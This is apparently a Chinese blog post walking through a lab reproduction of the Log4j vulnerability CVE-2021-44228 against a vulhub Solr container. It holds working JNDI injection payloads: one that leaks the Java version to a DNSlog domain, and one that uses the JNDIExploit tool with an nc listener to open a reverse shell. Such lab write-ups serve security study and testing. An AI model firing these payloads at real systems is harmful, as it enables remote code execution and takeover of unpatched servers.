首页 > 其他分享 >log4j漏洞CVE-2021-44228复现-排雷篇

log4j漏洞CVE-2021-44228复现-排雷篇

时间:2023-10-24 16:44:34浏览次数:33  
标签:vulhub Pull complete 2021 44228 CVE log4j

一、环境搭建(用相同的环境才能保证一定成功)

下载vulhub,其他环境可能存在GET请求无效问题:

git clone https://github.com/vulhub/vulhub.git

切换到指定漏洞环境目录:

vulhub/log4j/CVE-2021-44228

开启docker:
docker compose up -d

➜  vulhub git:(master) cd vulhub/log4j/CVE-2021-44228 
➜ CVE-2021-44228 git:(master) docker compose up -d [+] Running 9/9
⠿ solr Pulled 107.8s
⠿ 43c265008fae Pull complete 25.3s
⠿ af36d2c7a148 Pull complete 26.0s
⠿ 2b7b4d10e1c1 Pull complete 26.1s
⠿ f264389d8f2f Pull complete 26.2s
⠿ 1a2c46e93f4a Pull complete 26.3s
⠿ f9506bb322c0 Pull complete 48.9s
⠿ 96f5dad14c2c Pull complete 49.0s
⠿ c387eff49cc3 Pull complete 90.9s [+] Running 2/2
⠿ Network cve-2021-44228_default Created 0.1s
⠿ Container cve-2021-44228-solr-1 Started

访问地址显示如下界面表示搭建成功: http://127.0.0.1:8983

 

二、漏洞验证

  1. 登陆http://dnslog.cn/获取随机域名,下图中的第一步;
  2. 漏洞页面修改url为:http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xdeuza.dnslog.cn};
  3. 查看dnslog显示请求记录表示漏洞存在,上图中的第三步,未显示则点击上图中的第二步“Refresh Record”;

 

 

三、反弹shell

下载JNDI注入工具,https://github.com/WhiteHSBG/JNDIExploit,MD5 (JNDIExploit.v1.4.zip) = bafe42623aae09d18bafa610844d57c7 ,之前一直用1.0总是无法成功反弹shell

解压后启动:java -jar JNDIExploit-1.4-SNAPSHOT.jar -i  172.16.242.3

同时开启nc监听:nc -lvnp 6666

nc监听和JNDIExploit在同一台机器上,IP:172.16.242.3

构造payload请求并访问:http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://172.16.242.3:1389/Basic/ReverseShell/172.16.242.3/6666}

 

后台显示JNDI注入成功: 

 nc反弹shell成功上线 :

 

标签:vulhub,Pull,complete,2021,44228,CVE,log4j
From: https://www.cnblogs.com/MalwareA/p/17785204.html

相关文章

  • 【漏洞复现】Apache RocketMQ 代码注入漏洞(CVE-2023-37582)
    产品介绍ApacheRocketMQ是美国阿帕奇(Apache)基金会的一款轻量级的数据处理平台和消息传递引擎。漏洞概述ApacheRocketMQ存在代码注入漏洞,该漏洞源于当NameServer地址在外网泄露且缺乏权限验证时,NameServer组件仍然存在远程命令执行漏洞,在RocketMQ5.1.0及以下版本,在一定......
  • log4j2同步日志引发的性能问题
    1问题回顾1.1问题描述在项目的性能测试中,相关的接口的随着并发数增加,接口的响应时间变长,接口吞吐不再增长,应用的CPU使用率较高。1.2分析思路谁导致的CPU较高,阻塞接口TPS的增长?接口的响应时间的调用链分布是什么样的,有没有慢的点?1)使用火焰图分析应用的CPU如下,其中log4j2日......
  • Spring远程命令执行漏洞(CVE-2022-22965)原理研究
    一、前置知识SpringMVC参数绑定为了方便编程,SpringMVC支持将HTTP请求中的的请求参数或者请求体内容,根据Controller方法的参数,自动完成类型转换和赋值。之后,Controller方法就可以直接使用这些参数,避免了需要编写大量的代码从HttpServletRequest中获取请求数据以及类型转换。这个......
  • LOG4j2 漏洞复现
    一、漏洞简介1.漏洞原理ApacheLog4j2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词${,攻击者就能将关键字所包含的内容当作变量来替......
  • Webmin 远程命令执行 (CVE-2019-15107)
    说明内容漏洞编号CVE-2019-15107漏洞名称Webmin远程命令执行漏洞评级影响范围Webmin<=1.920漏洞描述该漏洞由于password_change.cgi文件在重置密码功能在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。修复方......
  • scala配置log4j+slf4j
    scala配置log4j+slf4j环境信息jdk17scala2.11.0导入依赖<dependency><groupId>org.slf4j</groupId><artifactId>slf4j-reload4j</artifactId><version>2.0.9</version></dependency>添加配置文件resource目录下新建lo......
  • 记一次Smanga SQL注入漏洞挖掘(CVE-2023-36076)
    记录一次本人CVE漏洞挖掘的过程,此漏洞已被分配编号:CVE-2023-36076引言水一篇文章,本文介绍了一次对某开源项目基于时间盲注的SQL注入漏洞的挖掘,此开源项目是一个流媒体管理平台,注入点为/php/history/add.php接口中的mediaId参数,指纹信息显示数据库采用Mysql。漏洞挖掘正常......
  • 记一次Smanga 身份验证绕过漏洞挖掘(CVE-2023-36079)
    记录一次本人CVE漏洞挖掘的过程,此漏洞已被分配编号:CVE-2023-36079引言本文介绍了一次针对某开源项目的身份验证绕过漏洞,此开源项目是一个流媒体管理平台。代码审计审计代码发现功能接口点使用check_user_power()函数进行权限校验。跟踪该函数,发现没有使用常规的JWT或者自......
  • 记一次Smanga 任意文件读取漏洞挖掘(CVE-2023-36077)
    记录一次本人CVE漏洞挖掘的过程,此漏洞已被分配编号:CVE-2023-36077引言水一篇文章,本文介绍了对一个开源项目的未授权任意文件读取漏洞的挖掘,此开源项目是一个流媒体管理平台。漏洞原理源码处使用了PHP函数file_get_contents读取文件内容,接收的参数file通过POST直接传入,没有......
  • CVE-2020-10977_GitLab任意文件读取导致RCE漏洞复现
    CVE-2020-10977_GitLab任意文件读取导致RCE漏洞复现0x01环境安装1yum-yinstallpolicycoreutilsopenssh-serveropenssh-clientspostfix分配给虚拟机的物理内存最好是4G。下载gitlab安装包CE下载地址:https://packages.gitlab.com/gitlab/gitlab-ceEE下......